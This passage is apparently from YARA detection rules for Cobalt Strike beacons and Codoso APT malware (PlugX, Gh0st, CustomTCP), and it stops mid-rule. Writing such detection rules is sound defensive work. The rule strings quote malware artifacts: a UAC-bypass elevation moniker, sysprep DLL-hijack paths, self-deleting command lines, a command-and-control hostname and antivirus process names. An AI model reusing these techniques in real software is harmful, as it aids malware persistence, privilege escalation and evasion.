$s193 = { C1 C0 C1 C0 C1 C3 ?? ?? C1 C3 C1 C0 C1 C3 ?? ?? C1 C2 C1 C3 C1 C5 ?? ?? ?? ?? C1 C5 C1 C3 C1 C5 ?? ?? ?? ?? C1 C4 C1 C0 C1 C3 ?? ?? }
$s194 = { C2 C3 C2 C3 C2 C0 ?? ?? C2 C0 C2 C3 C2 C0 ?? ?? C2 C1 C2 C0 C2 C6 ?? ?? ?? ?? C2 C6 C2 C0 C2 C6 ?? ?? ?? ?? C2 C7 C2 C3 C2 C0 ?? ?? }
$s195 = { C3 C2 C3 C2 C3 C1 ?? ?? C3 C1 C3 C2 C3 C1 ?? ?? C3 C0 C3 C1 C3 C7 ?? ?? ?? ?? C3 C7 C3 C1 C3 C7 ?? ?? ?? ?? C3 C6 C3 C2 C3 C1 ?? ?? }
$s196 = { C4 C5 C4 C5 C4 C6 ?? ?? C4 C6 C4 C5 C4 C6 ?? ?? C4 C7 C4 C6 C4 C0 ?? ?? ?? ?? C4 C0 C4 C6 C4 C0 ?? ?? ?? ?? C4 C1 C4 C5 C4 C6 ?? ?? }
$s197 = { C5 C4 C5 C4 C5 C7 ?? ?? C5 C7 C5 C4 C5 C7 ?? ?? C5 C6 C5 C7 C5 C1 ?? ?? ?? ?? C5 C1 C5 C7 C5 C1 ?? ?? ?? ?? C5 C0 C5 C4 C5 C7 ?? ?? }
$s198 = { C6 C7 C6 C7 C6 C4 ?? ?? C6 C4 C6 C7 C6 C4 ?? ?? C6 C5 C6 C4 C6 C2 ?? ?? ?? ?? C6 C2 C6 C4 C6 C2 ?? ?? ?? ?? C6 C3 C6 C7 C6 C4 ?? ?? }
$s199 = { C7 C6 C7 C6 C7 C5 ?? ?? C7 C5 C7 C6 C7 C5 ?? ?? C7 C4 C7 C5 C7 C3 ?? ?? ?? ?? C7 C3 C7 C5 C7 C3 ?? ?? ?? ?? C7 C2 C7 C6 C7 C5 ?? ?? }
$s200 = { C8 C9 C8 C9 C8 CA ?? ?? C8 CA C8 C9 C8 CA ?? ?? C8 CB C8 CA C8 CC ?? ?? ?? ?? C8 CC C8 CA C8 CC ?? ?? ?? ?? C8 CD C8 C9 C8 CA ?? ?? }
$s201 = { C9 C8 C9 C8 C9 CB ?? ?? C9 CB C9 C8 C9 CB ?? ?? C9 CA C9 CB C9 CD ?? ?? ?? ?? C9 CD C9 CB C9 CD ?? ?? ?? ?? C9 CC C9 C8 C9 CB ?? ?? }
$s202 = { CA CB CA CB CA C8 ?? ?? CA C8 CA CB CA C8 ?? ?? CA C9 CA C8 CA CE ?? ?? ?? ?? CA CE CA C8 CA CE ?? ?? ?? ?? CA CF CA CB CA C8 ?? ?? }
$s203 = { CB CA CB CA CB C9 ?? ?? CB C9 CB CA CB C9 ?? ?? CB C8 CB C9 CB CF ?? ?? ?? ?? CB CF CB C9 CB CF ?? ?? ?? ?? CB CE CB CA CB C9 ?? ?? }
$s204 = { CC CD CC CD CC CE ?? ?? CC CE CC CD CC CE ?? ?? CC CF CC CE CC C8 ?? ?? ?? ?? CC C8 CC CE CC C8 ?? ?? ?? ?? CC C9 CC CD CC CE ?? ?? }
$s205 = { CD CC CD CC CD CF ?? ?? CD CF CD CC CD CF ?? ?? CD CE CD CF CD C9 ?? ?? ?? ?? CD C9 CD CF CD C9 ?? ?? ?? ?? CD C8 CD CC CD CF ?? ?? }
$s206 = { CE CF CE CF CE CC ?? ?? CE CC CE CF CE CC ?? ?? CE CD CE CC CE CA ?? ?? ?? ?? CE CA CE CC CE CA ?? ?? ?? ?? CE CB CE CF CE CC ?? ?? }
$s207 = { CF CE CF CE CF CD ?? ?? CF CD CF CE CF CD ?? ?? CF CC CF CD CF CB ?? ?? ?? ?? CF CB CF CD CF CB ?? ?? ?? ?? CF CA CF CE CF CD ?? ?? }
$s208 = { D0 D1 D0 D1 D0 D2 ?? ?? D0 D2 D0 D1 D0 D2 ?? ?? D0 D3 D0 D2 D0 D4 ?? ?? ?? ?? D0 D4 D0 D2 D0 D4 ?? ?? ?? ?? D0 D5 D0 D1 D0 D2 ?? ?? }
$s209 = { D1 D0 D1 D0 D1 D3 ?? ?? D1 D3 D1 D0 D1 D3 ?? ?? D1 D2 D1 D3 D1 D5 ?? ?? ?? ?? D1 D5 D1 D3 D1 D5 ?? ?? ?? ?? D1 D4 D1 D0 D1 D3 ?? ?? }
$s210 = { D2 D3 D2 D3 D2 D0 ?? ?? D2 D0 D2 D3 D2 D0 ?? ?? D2 D1 D2 D0 D2 D6 ?? ?? ?? ?? D2 D6 D2 D0 D2 D6 ?? ?? ?? ?? D2 D7 D2 D3 D2 D0 ?? ?? }
$s211 = { D3 D2 D3 D2 D3 D1 ?? ?? D3 D1 D3 D2 D3 D1 ?? ?? D3 D0 D3 D1 D3 D7 ?? ?? ?? ?? D3 D7 D3 D1 D3 D7 ?? ?? ?? ?? D3 D6 D3 D2 D3 D1 ?? ?? }
$s212 = { D4 D5 D4 D5 D4 D6 ?? ?? D4 D6 D4 D5 D4 D6 ?? ?? D4 D7 D4 D6 D4 D0 ?? ?? ?? ?? D4 D0 D4 D6 D4 D0 ?? ?? ?? ?? D4 D1 D4 D5 D4 D6 ?? ?? }
$s213 = { D5 D4 D5 D4 D5 D7 ?? ?? D5 D7 D5 D4 D5 D7 ?? ?? D5 D6 D5 D7 D5 D1 ?? ?? ?? ?? D5 D1 D5 D7 D5 D1 ?? ?? ?? ?? D5 D0 D5 D4 D5 D7 ?? ?? }
$s214 = { D6 D7 D6 D7 D6 D4 ?? ?? D6 D4 D6 D7 D6 D4 ?? ?? D6 D5 D6 D4 D6 D2 ?? ?? ?? ?? D6 D2 D6 D4 D6 D2 ?? ?? ?? ?? D6 D3 D6 D7 D6 D4 ?? ?? }
$s215 = { D7 D6 D7 D6 D7 D5 ?? ?? D7 D5 D7 D6 D7 D5 ?? ?? D7 D4 D7 D5 D7 D3 ?? ?? ?? ?? D7 D3 D7 D5 D7 D3 ?? ?? ?? ?? D7 D2 D7 D6 D7 D5 ?? ?? }
$s216 = { D8 D9 D8 D9 D8 DA ?? ?? D8 DA D8 D9 D8 DA ?? ?? D8 DB D8 DA D8 DC ?? ?? ?? ?? D8 DC D8 DA D8 DC ?? ?? ?? ?? D8 DD D8 D9 D8 DA ?? ?? }
$s217 = { D9 D8 D9 D8 D9 DB ?? ?? D9 DB D9 D8 D9 DB ?? ?? D9 DA D9 DB D9 DD ?? ?? ?? ?? D9 DD D9 DB D9 DD ?? ?? ?? ?? D9 DC D9 D8 D9 DB ?? ?? }
$s218 = { DA DB DA DB DA D8 ?? ?? DA D8 DA DB DA D8 ?? ?? DA D9 DA D8 DA DE ?? ?? ?? ?? DA DE DA D8 DA DE ?? ?? ?? ?? DA DF DA DB DA D8 ?? ?? }
$s219 = { DB DA DB DA DB D9 ?? ?? DB D9 DB DA DB D9 ?? ?? DB D8 DB D9 DB DF ?? ?? ?? ?? DB DF DB D9 DB DF ?? ?? ?? ?? DB DE DB DA DB D9 ?? ?? }
$s220 = { DC DD DC DD DC DE ?? ?? DC DE DC DD DC DE ?? ?? DC DF DC DE DC D8 ?? ?? ?? ?? DC D8 DC DE DC D8 ?? ?? ?? ?? DC D9 DC DD DC DE ?? ?? }
$s221 = { DD DC DD DC DD DF ?? ?? DD DF DD DC DD DF ?? ?? DD DE DD DF DD D9 ?? ?? ?? ?? DD D9 DD DF DD D9 ?? ?? ?? ?? DD D8 DD DC DD DF ?? ?? }
$s222 = { DE DF DE DF DE DC ?? ?? DE DC DE DF DE DC ?? ?? DE DD DE DC DE DA ?? ?? ?? ?? DE DA DE DC DE DA ?? ?? ?? ?? DE DB DE DF DE DC ?? ?? }
$s223 = { DF DE DF DE DF DD ?? ?? DF DD DF DE DF DD ?? ?? DF DC DF DD DF DB ?? ?? ?? ?? DF DB DF DD DF DB ?? ?? ?? ?? DF DA DF DE DF DD ?? ?? }
$s224 = { E0 E1 E0 E1 E0 E2 ?? ?? E0 E2 E0 E1 E0 E2 ?? ?? E0 E3 E0 E2 E0 E4 ?? ?? ?? ?? E0 E4 E0 E2 E0 E4 ?? ?? ?? ?? E0 E5 E0 E1 E0 E2 ?? ?? }
$s225 = { E1 E0 E1 E0 E1 E3 ?? ?? E1 E3 E1 E0 E1 E3 ?? ?? E1 E2 E1 E3 E1 E5 ?? ?? ?? ?? E1 E5 E1 E3 E1 E5 ?? ?? ?? ?? E1 E4 E1 E0 E1 E3 ?? ?? }
$s226 = { E2 E3 E2 E3 E2 E0 ?? ?? E2 E0 E2 E3 E2 E0 ?? ?? E2 E1 E2 E0 E2 E6 ?? ?? ?? ?? E2 E6 E2 E0 E2 E6 ?? ?? ?? ?? E2 E7 E2 E3 E2 E0 ?? ?? }
$s227 = { E3 E2 E3 E2 E3 E1 ?? ?? E3 E1 E3 E2 E3 E1 ?? ?? E3 E0 E3 E1 E3 E7 ?? ?? ?? ?? E3 E7 E3 E1 E3 E7 ?? ?? ?? ?? E3 E6 E3 E2 E3 E1 ?? ?? }
$s228 = { E4 E5 E4 E5 E4 E6 ?? ?? E4 E6 E4 E5 E4 E6 ?? ?? E4 E7 E4 E6 E4 E0 ?? ?? ?? ?? E4 E0 E4 E6 E4 E0 ?? ?? ?? ?? E4 E1 E4 E5 E4 E6 ?? ?? }
$s229 = { E5 E4 E5 E4 E5 E7 ?? ?? E5 E7 E5 E4 E5 E7 ?? ?? E5 E6 E5 E7 E5 E1 ?? ?? ?? ?? E5 E1 E5 E7 E5 E1 ?? ?? ?? ?? E5 E0 E5 E4 E5 E7 ?? ?? }
$s230 = { E6 E7 E6 E7 E6 E4 ?? ?? E6 E4 E6 E7 E6 E4 ?? ?? E6 E5 E6 E4 E6 E2 ?? ?? ?? ?? E6 E2 E6 E4 E6 E2 ?? ?? ?? ?? E6 E3 E6 E7 E6 E4 ?? ?? }
$s231 = { E7 E6 E7 E6 E7 E5 ?? ?? E7 E5 E7 E6 E7 E5 ?? ?? E7 E4 E7 E5 E7 E3 ?? ?? ?? ?? E7 E3 E7 E5 E7 E3 ?? ?? ?? ?? E7 E2 E7 E6 E7 E5 ?? ?? }
$s232 = { E8 E9 E8 E9 E8 EA ?? ?? E8 EA E8 E9 E8 EA ?? ?? E8 EB E8 EA E8 EC ?? ?? ?? ?? E8 EC E8 EA E8 EC ?? ?? ?? ?? E8 ED E8 E9 E8 EA ?? ?? }
$s233 = { E9 E8 E9 E8 E9 EB ?? ?? E9 EB E9 E8 E9 EB ?? ?? E9 EA E9 EB E9 ED ?? ?? ?? ?? E9 ED E9 EB E9 ED ?? ?? ?? ?? E9 EC E9 E8 E9 EB ?? ?? }
$s234 = { EA EB EA EB EA E8 ?? ?? EA E8 EA EB EA E8 ?? ?? EA E9 EA E8 EA EE ?? ?? ?? ?? EA EE EA E8 EA EE ?? ?? ?? ?? EA EF EA EB EA E8 ?? ?? }
$s235 = { EB EA EB EA EB E9 ?? ?? EB E9 EB EA EB E9 ?? ?? EB E8 EB E9 EB EF ?? ?? ?? ?? EB EF EB E9 EB EF ?? ?? ?? ?? EB EE EB EA EB E9 ?? ?? }
$s236 = { EC ED EC ED EC EE ?? ?? EC EE EC ED EC EE ?? ?? EC EF EC EE EC E8 ?? ?? ?? ?? EC E8 EC EE EC E8 ?? ?? ?? ?? EC E9 EC ED EC EE ?? ?? }
$s237 = { ED EC ED EC ED EF ?? ?? ED EF ED EC ED EF ?? ?? ED EE ED EF ED E9 ?? ?? ?? ?? ED E9 ED EF ED E9 ?? ?? ?? ?? ED E8 ED EC ED EF ?? ?? }
$s238 = { EE EF EE EF EE EC ?? ?? EE EC EE EF EE EC ?? ?? EE ED EE EC EE EA ?? ?? ?? ?? EE EA EE EC EE EA ?? ?? ?? ?? EE EB EE EF EE EC ?? ?? }
$s239 = { EF EE EF EE EF ED ?? ?? EF ED EF EE EF ED ?? ?? EF EC EF ED EF EB ?? ?? ?? ?? EF EB EF ED EF EB ?? ?? ?? ?? EF EA EF EE EF ED ?? ?? }
$s240 = { F0 F1 F0 F1 F0 F2 ?? ?? F0 F2 F0 F1 F0 F2 ?? ?? F0 F3 F0 F2 F0 F4 ?? ?? ?? ?? F0 F4 F0 F2 F0 F4 ?? ?? ?? ?? F0 F5 F0 F1 F0 F2 ?? ?? }
$s241 = { F1 F0 F1 F0 F1 F3 ?? ?? F1 F3 F1 F0 F1 F3 ?? ?? F1 F2 F1 F3 F1 F5 ?? ?? ?? ?? F1 F5 F1 F3 F1 F5 ?? ?? ?? ?? F1 F4 F1 F0 F1 F3 ?? ?? }
$s242 = { F2 F3 F2 F3 F2 F0 ?? ?? F2 F0 F2 F3 F2 F0 ?? ?? F2 F1 F2 F0 F2 F6 ?? ?? ?? ?? F2 F6 F2 F0 F2 F6 ?? ?? ?? ?? F2 F7 F2 F3 F2 F0 ?? ?? }
$s243 = { F3 F2 F3 F2 F3 F1 ?? ?? F3 F1 F3 F2 F3 F1 ?? ?? F3 F0 F3 F1 F3 F7 ?? ?? ?? ?? F3 F7 F3 F1 F3 F7 ?? ?? ?? ?? F3 F6 F3 F2 F3 F1 ?? ?? }
$s244 = { F4 F5 F4 F5 F4 F6 ?? ?? F4 F6 F4 F5 F4 F6 ?? ?? F4 F7 F4 F6 F4 F0 ?? ?? ?? ?? F4 F0 F4 F6 F4 F0 ?? ?? ?? ?? F4 F1 F4 F5 F4 F6 ?? ?? }
$s245 = { F5 F4 F5 F4 F5 F7 ?? ?? F5 F7 F5 F4 F5 F7 ?? ?? F5 F6 F5 F7 F5 F1 ?? ?? ?? ?? F5 F1 F5 F7 F5 F1 ?? ?? ?? ?? F5 F0 F5 F4 F5 F7 ?? ?? }
$s246 = { F6 F7 F6 F7 F6 F4 ?? ?? F6 F4 F6 F7 F6 F4 ?? ?? F6 F5 F6 F4 F6 F2 ?? ?? ?? ?? F6 F2 F6 F4 F6 F2 ?? ?? ?? ?? F6 F3 F6 F7 F6 F4 ?? ?? }
$s247 = { F7 F6 F7 F6 F7 F5 ?? ?? F7 F5 F7 F6 F7 F5 ?? ?? F7 F4 F7 F5 F7 F3 ?? ?? ?? ?? F7 F3 F7 F5 F7 F3 ?? ?? ?? ?? F7 F2 F7 F6 F7 F5 ?? ?? }
$s248 = { F8 F9 F8 F9 F8 FA ?? ?? F8 FA F8 F9 F8 FA ?? ?? F8 FB F8 FA F8 FC ?? ?? ?? ?? F8 FC F8 FA F8 FC ?? ?? ?? ?? F8 FD F8 F9 F8 FA ?? ?? }
$s249 = { F9 F8 F9 F8 F9 FB ?? ?? F9 FB F9 F8 F9 FB ?? ?? F9 FA F9 FB F9 FD ?? ?? ?? ?? F9 FD F9 FB F9 FD ?? ?? ?? ?? F9 FC F9 F8 F9 FB ?? ?? }
$s250 = { FA FB FA FB FA F8 ?? ?? FA F8 FA FB FA F8 ?? ?? FA F9 FA F8 FA FE ?? ?? ?? ?? FA FE FA F8 FA FE ?? ?? ?? ?? FA FF FA FB FA F8 ?? ?? }
$s251 = { FB FA FB FA FB F9 ?? ?? FB F9 FB FA FB F9 ?? ?? FB F8 FB F9 FB FF ?? ?? ?? ?? FB FF FB F9 FB FF ?? ?? ?? ?? FB FE FB FA FB F9 ?? ?? }
$s252 = { FC FD FC FD FC FE ?? ?? FC FE FC FD FC FE ?? ?? FC FF FC FE FC F8 ?? ?? ?? ?? FC F8 FC FE FC F8 ?? ?? ?? ?? FC F9 FC FD FC FE ?? ?? }
$s253 = { FD FC FD FC FD FF ?? ?? FD FF FD FC FD FF ?? ?? FD FE FD FF FD F9 ?? ?? ?? ?? FD F9 FD FF FD F9 ?? ?? ?? ?? FD F8 FD FC FD FF ?? ?? }
$s254 = { FE FF FE FF FE FC ?? ?? FE FC FE FF FE FC ?? ?? FE FD FE FC FE FA ?? ?? ?? ?? FE FA FE FC FE FA ?? ?? ?? ?? FE FB FE FF FE FC ?? ?? }
$s255 = { FF FE FF FE FF FD ?? ?? FF FD FF FE FF FD ?? ?? FF FC FF FD FF FB ?? ?? ?? ?? FF FB FF FD FF FB ?? ?? ?? ?? FF FA FF FE FF FD ?? ?? }
$fp1 = "ICSharpCode.Decompiler" wide
condition:
any of ($s*) and not 1 of ($fp*)
}
rule CobaltStrike_MZ_Launcher {
meta:
description = "Detects CobaltStrike MZ header ReflectiveLoader launcher"
author = "yara@s3c.za.net"
date = "2021-07-08"
id = "461a4741-11c5-53d9-b8e1-52d64cfe755b"
strings:
$mz_launcher = { 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D }
condition:
$mz_launcher
}
rule CobaltStrike_Unmodifed_Beacon {
meta:
description = "Detects unmodified CobaltStrike beacon DLL"
author = "yara@s3c.za.net"
date = "2019-08-16"
id = "8eeb03f9-9698-5a46-b45b-224d5c3f3df7"
strings:
$loader_export = "ReflectiveLoader"
$exportname = "beacon.dll"
condition:
all of them
}

367
yara-Neo23x0/apt_codoso.yar Normal file
View file

@ -0,0 +1,367 @@
/*
Yara Rule Set
Author: Florian Roth
Date: 2016-01-30
Identifier: Codoso
Comment: Reduced signature set for LOKI integration
*/
/* Rule Set ----------------------------------------------------------------- */
rule Codoso_PlugX_3 {
meta:
description = "Detects Codoso APT PlugX Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
hash = "74e1e83ac69e45a3bee78ac2fac00f9e897f281ea75ed179737e9b6fe39971e3"
id = "55066812-3a8e-5099-afb4-ff7a59f1ccb2"
strings:
$s1 = "Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password." fullword wide
$s2 = "mcs.exe" fullword ascii
$s3 = "McAltLib.dll" fullword ascii
$s4 = "WinRAR self-extracting archive" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 1200KB and all of them
}
rule Codoso_PlugX_2 {
meta:
description = "Detects Codoso APT PlugX Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
hash = "b9510e4484fa7e3034228337768176fce822162ad819539c6ca3631deac043eb"
id = "0402a0ff-5664-52db-a739-51c5181853f8"
strings:
$s1 = "%TEMP%\\HID" fullword wide
$s2 = "%s\\hid.dll" fullword wide
$s3 = "%s\\SOUNDMAN.exe" fullword wide
$s4 = "\"%s\\SOUNDMAN.exe\" %d %d" fullword wide
$s5 = "%s\\HID.dllx" fullword wide
condition:
( uint16(0) == 0x5a4d and filesize < 400KB and 3 of them ) or all of them
}
rule Codoso_CustomTCP_4 {
meta:
description = "Detects Codoso APT CustomTCP Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
hash1 = "ea67d76e9d2e9ce3a8e5f80ff9be8f17b2cd5b1212153fdf36833497d9c060c0"
hash2 = "130abb54112dd47284fdb169ff276f61f2b69d80ac0a9eac52200506f147b5f8"
hash3 = "3ea6b2b51050fe7c07e2cf9fa232de6a602aa5eff66a2e997b25785f7cf50daa"
hash4 = "02cf5c244aebaca6195f45029c1e37b22495609be7bdfcfcd79b0c91eac44a13"
id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
strings:
$x1 = "varus_service_x86.dll" fullword ascii
$s1 = "/s %s /p %d /st %d /rt %d" fullword ascii
$s2 = "net start %%1" fullword ascii
$s3 = "ping 127.1 > nul" fullword ascii
$s4 = "McInitMISPAlertEx" fullword ascii
$s5 = "sc start %%1" fullword ascii
$s6 = "net stop %%1" fullword ascii
$s7 = "WorkerRun" fullword ascii
condition:
( uint16(0) == 0x5a4d and filesize < 400KB and 5 of them ) or
( $x1 and 2 of ($s*) )
}
rule Codoso_CustomTCP_3 {
meta:
description = "Detects Codoso APT CustomTCP Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
hash = "d66106ec2e743dae1d71b60a602ca713b93077f56a47045f4fc9143aa3957090"
id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
strings:
$s1 = "DnsApi.dll" fullword ascii
$s2 = "softWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\%s" ascii
$s3 = "CONNECT %s:%d hTTP/1.1" ascii
$s4 = "CONNECT %s:%d HTTp/1.1" ascii
$s5 = "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0;)" ascii
$s6 = "iphlpapi.dll" ascii
$s7 = "%systemroot%\\Web\\" ascii
$s8 = "Proxy-Authorization: Negotiate %s" ascii
$s9 = "CLSID\\{%s}\\InprocServer32" ascii
condition:
( uint16(0) == 0x5a4d and filesize < 500KB and 5 of them ) or 7 of them
}
rule Codoso_CustomTCP_2 {
meta:
description = "Detects Codoso APT CustomTCP Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
hash = "3577845d71ae995762d4a8f43b21ada49d809f95c127b770aff00ae0b64264a3"
id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
strings:
$s1 = "varus_service_x86.dll" fullword ascii
$s2 = "/s %s /p %d /st %d /rt %d" fullword ascii
$s3 = "net start %%1" fullword ascii
$s4 = "ping 127.1 > nul" fullword ascii
$s5 = "McInitMISPAlertEx" fullword ascii
$s6 = "sc start %%1" fullword ascii
$s7 = "B_WKNDNSK^" fullword ascii
$s8 = "net stop %%1" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 406KB and all of them
}
rule Codoso_PGV_PVID_6 {
meta:
description = "Detects Codoso APT PGV_PVID Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
hash = "4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f"
id = "6d1d8490-fdcb-5263-ae00-0b436e822fc3"
strings:
$s0 = "rundll32 \"%s\",%s" fullword ascii
$s1 = "/c ping 127.%d & del \"%s\"" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 6000KB and all of them
}
rule Codoso_Gh0st_3 {
meta:
description = "Detects Codoso APT Gh0st Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
hash = "bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd"
id = "55fb17c5-ee11-55be-9af3-e9fe8d6160b5"
strings:
$x1 = "RunMeByDLL32" fullword ascii
$s1 = "svchost.dll" fullword wide
$s2 = "server.dll" fullword ascii
$s3 = "Copyright ? 2008" fullword wide
$s4 = "testsupdate33" fullword ascii
$s5 = "Device Protect Application" fullword wide
$s6 = "MSVCP60.DLL" fullword ascii /* Goodware String - occured 1 times */
$s7 = "mail-news.eicp.net" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 195KB and $x1 or 4 of them
}
rule Codoso_Gh0st_2 {
meta:
description = "Detects Codoso APT Gh0st Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
hash = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
id = "5643d028-2a76-5bce-bf2f-8be706ab1fd5"
strings:
$s0 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
$s1 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
$s13 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
$s14 = "%s -r debug 1" fullword ascii
$s15 = "\\\\.\\keymmdrv1" fullword ascii
$s17 = "RunMeByDLL32" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 500KB and 1 of them
}
rule Codoso_CustomTCP {
meta:
description = "Codoso CustomTCP Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
hash = "b95d7f56a686a05398198d317c805924c36f3abacbb1b9e3f590ec0d59f845d8"
id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
strings:
$s4 = "wnyglw" fullword ascii
$s5 = "WorkerRun" fullword ascii
$s7 = "boazdcd" fullword ascii
$s8 = "wayflw" fullword ascii
$s9 = "CODETABL" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 405KB and all of them
}
/* Super Rules ------------------------------------------------------------- */
rule Codoso_PGV_PVID_5 {
meta:
description = "Detects Codoso APT PGV PVID Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
super_rule = 1
hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
hash2 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
id = "0202d82c-c1f8-59f7-96b6-b21f21c1dc69"
strings:
$s1 = "/c del %s >> NUL" fullword ascii
$s2 = "%s%s.manifest" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 500KB and all of them
}
rule Codoso_Gh0st_1 {
meta:
description = "Detects Codoso APT Gh0st Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
super_rule = 1
hash1 = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
hash2 = "7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8"
hash3 = "d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297"
id = "24d9e64c-4b35-5737-92ae-8ec391d494c7"
strings:
$x1 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
$x2 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
$x3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
$x4 = "\\\\.\\keymmdrv1" fullword ascii
$s1 = "spideragent.exe" fullword ascii
$s2 = "AVGIDSAgent.exe" fullword ascii
$s3 = "kavsvc.exe" fullword ascii
$s4 = "mspaint.exe" fullword ascii
$s5 = "kav.exe" fullword ascii
$s6 = "avp.exe" fullword ascii
$s7 = "NAV.exe" fullword ascii
$c1 = "Elevation:Administrator!new:" wide
$c2 = "Global\\RUNDLL32EXITEVENT_NAME{12845-8654-543}" fullword ascii
$c3 = "\\sysprep\\sysprep.exe" wide
$c4 = "\\sysprep\\CRYPTBASE.dll" wide
$c5 = "Global\\TERMINATEEVENT_NAME{12845-8654-542}" fullword ascii
$c6 = "ConsentPromptBehaviorAdmin" fullword ascii
$c7 = "\\sysprep" wide
$c8 = "Global\\UN{5FFC0C8B-8BE5-49d5-B9F2-BCDC8976EE10}" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 1000KB and ( 4 of ($s*) or 4 of ($c*) ) or
1 of ($x*) or
6 of ($c*)
}
rule Codoso_PGV_PVID_4 {
meta:
description = "Detects Codoso APT PlugX Malware"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
date = "2016-01-30"
super_rule = 1
hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
hash2 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
hash3 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
hash4 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
hash5 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
id = "c1c753a6-77b6-5bfb-89f9-16127c264fd0"
strings:
$x1 = "dropper, Version 1.0" fullword wide
$x2 = "dropper" fullword wide
$x3 = "DROPPER" fullword wide
$x4 = "About dropper" fullword wide
$s1 = "Microsoft Windows Manager Utility" fullword wide
$s2 = "SYSTEM\\CurrentControlSet\\Services\\" ascii /* Goodware String - occured 9 times */
$s3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify" fullword ascii /* Goodware String - occured 10 times */
$s4 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3" ascii /* Goodware String - occured 46 times */
